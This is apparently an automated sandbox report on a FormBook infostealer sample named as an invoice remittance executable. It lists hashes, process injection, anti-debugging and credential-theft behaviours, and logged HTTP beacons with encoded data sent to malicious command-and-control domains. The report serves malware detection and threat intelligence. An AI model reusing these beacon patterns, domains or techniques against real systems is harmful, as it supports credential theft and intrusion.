Edit tour

Windows Analysis Report
Invoice Remittance ref20250226.exe

Overview

General Information

Sample name:	Invoice Remittance ref20250226.exe
Analysis ID:	1625666
MD5:	9aae1928d067957d28925ba0dbeb8984
SHA1:	406158d86f8584dc9a7bb4ab7f6afa0b038d81fc
SHA256:	cc4a473cb0b7e331d6de4ce7ffb1b89f9fbd912bc87784b0f39e171b9866630a
Tags:	exeuser-James_inthe_box
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Invoice Remittance ref20250226.exe (PID: 7740 cmdline: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe" MD5: 9AAE1928D067957D28925BA0DBEB8984)

svchost.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

b7xVJvvK.exe (PID: 3092 cmdline: "C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\ORXw1Rat3V.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

takeown.exe (PID: 7088 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)

b7xVJvvK.exe (PID: 1340 cmdline: "C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\U84dQvZu.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7452 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.1487507905.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3727463287.00000000057C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1493104684.00000000079B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3725513198.0000000003280000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3722004871.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1489001963.00000000037E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3722928185.0000000003020000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3725327628.0000000002680000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", CommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", CommandLine|base64offset|contains: Eq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", ParentImage: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe, ParentProcessId: 7740, ParentProcessName: Invoice Remittance ref20250226.exe, ProcessCommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", ProcessId: 7280, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", CommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", CommandLine|base64offset|contains: Eq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", ParentImage: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe, ParentProcessId: 7740, ParentProcessName: Invoice Remittance ref20250226.exe, ProcessCommandLine: "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe", ProcessId: 7280, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.blockchainsupplier.xyz/60gi/	Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/	Avira URL Cloud: Label: malware
Source: http://www.starsfly.shop/sb5i/?pB=9MRh6GXEelzeYT8DvpLpXRfXsc3jzyaIPHG/yQxatGRPvFFbhVgwl87m6ROeOLQXD10xf3R+R1H4gbZhIs98g9aGvg3K2gOvGSaGuouYRZO7UfRCoNnkO7Zr3klTbLWJtTtCNiD+jVWX&c6=EHSTk22XIz	Avira URL Cloud: Label: malware
Source: http://www.starsfly.shop/sb5i/	Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/?pB=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3Zc&c6=EHSTk22XIz	Avira URL Cloud: Label: malware
Source: http://www.nan21.net/qgyh/	Avira URL Cloud: Label: malware
Source: http://www.nan21.net/qgyh/?pB=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&c6=EHSTk22XIz	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Invoice Remittance ref20250226.exe	ReversingLabs: Detection: 52%
Source: Invoice Remittance ref20250226.exe	Virustotal: Detection: 37%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1487507905.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3727463287.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1493104684.00000000079B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3725513198.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722004871.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1489001963.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722928185.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725327628.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Invoice Remittance ref20250226.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: takeown.pdbGCTL source: svchost.exe, 00000006.00000003.1455827915.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455726353.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455802780.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000002.3723141717.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoice Remittance ref20250226.exe, 00000001.00000003.1295599035.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Remittance ref20250226.exe, 00000001.00000003.1295722632.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1382927792.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1381301656.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.000000000359E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.000000000367E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1487695493.000000000318B000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1489558937.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: svchost.exe, 00000006.00000003.1455827915.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455726353.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455802780.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000002.3723141717.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Invoice Remittance ref20250226.exe, 00000001.00000003.1295599035.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Remittance ref20250226.exe, 00000001.00000003.1295722632.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000003.1382927792.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1381301656.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.000000000359E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000002.3725905199.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.000000000367E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1487695493.000000000318B000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1489558937.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3723139760.000000000308E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3726476192.0000000003B0C000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1802524063.0000000014F9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3723139760.000000000308E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3726476192.0000000003B0C000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1802524063.0000000014F9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: b7xVJvvK.exe, 00000008.00000002.3724366113.0000000000E6F000.00000002.00000001.01000000.00000006.sdmp, b7xVJvvK.exe, 0000000B.00000000.1566850680.0000000000E6F000.00000002.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0079445A
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079C6D1 FindFirstFileW,FindClose,	1_2_0079C6D1
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0079C75C
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0079EF95
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0079F0F2
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0079F3F3
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_007937EF
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00793B12
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0079BCBC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B2C380 FindFirstFileW,FindNextFileW,FindClose,	10_2_02B2C380

Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then xor eax, eax		10_2_02B19DD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_033804F8

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.sislieskort.xyz
Source:	DNS query: www.dolfisstillspinnin.xyz
Source:	DNS query: www.multo.xyz
Source:	DNS query: www.blockchainsupplier.xyz
Source:	DNS query: www.snapps.xyz
Source:	DNS query: www.visualizar.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 198.252.98.84 198.252.98.84
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_007A22EE

Source: global traffic	HTTP traffic detected: GET /glm7/?c6=EHSTk22XIz&pB=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/pleOey0sc8S0ib7OOh7z7fGv7sMnhuGQuR1OqqP/gFu6SjBFzp/nPU1r HTTP/1.1Host: www.sislieskort.xyzAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qgyh/?pB=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&c6=EHSTk22XIz HTTP/1.1Host: www.nan21.netAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /a669/?pB=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rlITGUcf3IDt8IN8iuUtzhkIqtflv5uvSpmjHt/ELf0cmfR80FVkQrxF&c6=EHSTk22XIz HTTP/1.1Host: www.rbopisalive.cyouAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /z4h6/?pB=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznugcKQdiSd/wXofryMQWvD5YoPjAEedRmMDhWexrbX1Mw92hr2mQUP2y&c6=EHSTk22XIz HTTP/1.1Host: www.dolfisstillspinnin.xyzAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7pb3/?pB=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3Zc&c6=EHSTk22XIz HTTP/1.1Host: www.multo.xyzAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6sso/?pB=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7YRDnIft8iMUEvGwfVjhhqn2us8yCCnuzBi/MN+sqdUphmSVyeeEJlEm&c6=EHSTk22XIz HTTP/1.1Host: www.zenilow.siteAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /37iq/?c6=EHSTk22XIz&pB=W4F2zohB5pQ72r97CGdqxaJtVP2Tx0vwqEbNWqUJsjhZovGOMKQzdy5mphqfsmmmu4a+Cp8WVxz5WDDoq4ZXIJFY8IQdAPpDun87GDn75NZxeCSKPVWYskYW1N4aqYZjQGTWdEFlHIyP HTTP/1.1Host: www.kakeksakti43.cfdAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ykem/?pB=E0sXKQaLvgTg75hoXw1gHo2OsBTpV1cxhdRaED8kpqRq++k5pJbhV6DI0CHNIAyeg6Wy8Td7nNCLTNmlSlh5+Fx3kBneql6REUkG3Mcbnw/IrZ+PFIrYZ5ItXMv7bBEoVgBTU3XW0FKe&c6=EHSTk22XIz HTTP/1.1Host: www.kakeksakti12.cfdAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /55e2/?c6=EHSTk22XIz&pB=DaO7Yp0FDHqMrbUQD3DouLdymBRckPD9dCyF694WYV/+0fgPHIbrXuZ/ECEaGLLfmHnUVjoZMekH1WbEb0uh4hGwZSkD1zAE8dto7Eh6gonhXygS5R56KA+T+VRRZoFoG+cvWgxn+FwR HTTP/1.1Host: www.du6m8zk1.vipAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /awx7/?pB=MEVj+xbqMbAMoLghObizL7AI1q6HEX97S9+pCfGX8Db21+TJEs86pLZWBhNeroJQjzYVqso3k1c+5wy7cf9LMclOMx6514849AWy4yvnFYifGqv7yZO0AYp+n1HTrNpww8SNg4pJlDeG&c6=EHSTk22XIz HTTP/1.1Host: www.mayaheenterprise.shopAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /60gi/?pB=j56atjWAt5kgdRtUeCgbnSwhBSx9jGYh0Si9VqSWuTcW1o3nYiuSF+UKUhYSZXPzqScMBmGwUOIP4DSG9KBl9ghD1fA/B5muIRudTvO0qjtAycKdO9RfLyqbgsgo/CJyx45oqel7W4VH&c6=EHSTk22XIz HTTP/1.1Host: www.blockchainsupplier.xyzAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /sb5i/?pB=9MRh6GXEelzeYT8DvpLpXRfXsc3jzyaIPHG/yQxatGRPvFFbhVgwl87m6ROeOLQXD10xf3R+R1H4gbZhIs98g9aGvg3K2gOvGSaGuouYRZO7UfRCoNnkO7Zr3klTbLWJtTtCNiD+jVWX&c6=EHSTk22XIz HTTP/1.1Host: www.starsfly.shopAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6tzz/?pB=034QHq0x+mWczPTyFn297YnSquqWDOc1hkpMd48xQ6mHJBCDCG2utuJ+jQv0MZDProgzpWwCUXbW8mPgDREPMUKleOGs0B2R3p17LxXfiLJaJe+pmtwhtNePbndPuZIclE+yHxDY3AdK&c6=EHSTk22XIz HTTP/1.1Host: www.snapps.xyzAccept: /Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.sislieskort.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nan21.net
Source: global traffic	DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic	DNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
Source: global traffic	DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic	DNS traffic detected: DNS query: www.zenilow.site
Source: global traffic	DNS traffic detected: DNS query: www.kakeksakti43.cfd
Source: global traffic	DNS traffic detected: DNS query: www.kakeksakti12.cfd
Source: global traffic	DNS traffic detected: DNS query: www.du6m8zk1.vip
Source: global traffic	DNS traffic detected: DNS query: www.mayaheenterprise.shop
Source: global traffic	DNS traffic detected: DNS query: www.blockchainsupplier.xyz
Source: global traffic	DNS traffic detected: DNS query: www.starsfly.shop
Source: global traffic	DNS traffic detected: DNS query: www.snapps.xyz
Source: global traffic	DNS traffic detected: DNS query: www.visualizar.xyz

Source: unknown

